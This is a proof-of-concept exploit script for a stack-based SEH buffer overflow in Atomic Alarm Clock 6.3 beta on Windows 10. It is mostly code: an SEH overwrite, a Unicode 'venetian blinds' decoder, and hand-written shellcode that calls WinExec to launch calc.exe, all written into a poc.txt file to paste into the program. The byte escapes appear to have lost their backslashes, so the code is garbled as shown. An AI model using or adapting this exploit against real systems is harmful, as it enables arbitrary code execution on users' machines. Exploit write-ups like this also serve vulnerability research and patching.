Atomic Alarm Clock 6.3 Stack Overflow ↭
# Exploit Author: Bobby Cooke
# Date: April 17th, 2020
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer
File = 'poc.txt'
os_nSEH = 'x41'*(461)
nSEH = 'xebx05' # jmp short +2
SEH = 'x47x47' # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe]
#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False
getPC = 'x73' # add [ebx], dh # nop | [EBX] = writable memory
getPC += 'x61' # popad # [ESP] = &Payload
getPC += 'x72' # add [edx], dh # realigns execution for 1 byte opcodes
ebx2eax = 'x58' # pop eax # EAX = &Payload
ebx2eax += 'x72' # add [edx], dh
# Ajust EAX to &Decoder
getDecoder = 'x05x13x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += 'x72' # add [edx], dh
getDecoder += 'x2Dx11x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += 'x72' # add [edx], dh
getDecoder += 'x50' # push eax # [ESP] = &Decoder
getDecoder += 'x72' # add [edx], dh
#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = 'x50x47xD2xC9xB9x04xDBx42xDBx1Cx20x30x47x74xEBx50'
## 2nd byte - x00 => x5F
venBlinds = 'x40x72xC6x5Fx72x40x72x40x72'
## 4th byte - x00 => x33
venBlinds += 'xC6x33x72x40x72x40x72'
## 6th byte - x00 => x33
venBlinds += 'xC6x33x72x40x72x40x72'
## 8th byte - x00 => x66
venBlinds += 'xC6x66x72x40x72x40x72'
## 10th byte - x00 => x10
venBlinds += 'xC6x10x72x40x72x40x72'
## 12th byte - x00 => x33
venBlinds += 'xC6x33x72x40x72x40x72'
## 14th byte - x00 => x42
venBlinds += 'xC6x42x72x40x72x40x72'
## 16th byte - x00 => x32
venBlinds += 'xC6x32x72x40x72x40x72'
## 18th byte - x00 => x02
venBlinds += 'xC6x02x72x40x72x40x72'
## 20th byte - x00 => x10
venBlinds += 'xC6x10x72x40x72x40x72'
## 22nd byte - x00 => x3F
venBlinds += 'xC6x3Fx72x40x72x40x72'
## 24nd byte - x00 => x1F
venBlinds += 'xC6x1Fx72x40x72x40x72'
## 26th byte - x00 => x49
venBlinds += 'xC6x49x72x40x72x40x72'
## 28th byte - x00 => x02
venBlinds += 'xC6x02x72x40x72x40x72'
## 30th byte - x00 => xED
venBlinds += 'xC6xEDx72x40x72x40x72'
## 32nd byte - x00 => xC3
venBlinds += 'xC6xC3x72x40x72'
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds += 'xC3' # ret [!] Now we are executing the decoder!
os_decoder = 'x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
# Custom PopCalc shellcode that avoids the bad characters
fKernel32 = 'x33xF6xF7xE6x64x03x52x30x03x42x0Cx03x70x1CxADx50x5ExADxFFx70x08'
gExpotTbl = 'x33xC9x33xF6x33xDBxF7xE3x58x50x03x70x3Cx03xF0x03x56x78x03xD0x03x5Ax20x03xD8x03x4Ax24x03xC8x51x33xFFx03x7Ax1Cx03xF8x57'
fWinExec = 'x68x57x69x6Ex45x33xC0x33xF6x03xF4xFCx50x33xC9x41x41x41x41xF7xE1x33xFFx03x3Cx18x58x03x7Cx24x0CxF3xA6x74x03x40xEBxE1x33xC9x41x41xF7xE1x33xC9x03x4Cx24x08x03xC8x33xC0x66x03x01x33xC9x41x41x41x41xF7xE1xFFx74x24x04x01x04x24x5Ax33xDBx03x1Ax03x5Cx24x0C'
# Call WinExec( CmdLine, ShowState );
# CmdLine = "calc.exe"
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = 'x33xC9x51x68x2Ex65x78x65x68x63x61x6Cx63x33xC0x03xC4x41x51x50xFFxD3'
shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler = 'x77'*(9000-len(buffer))
buffer = buffer+filler
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'
Gloss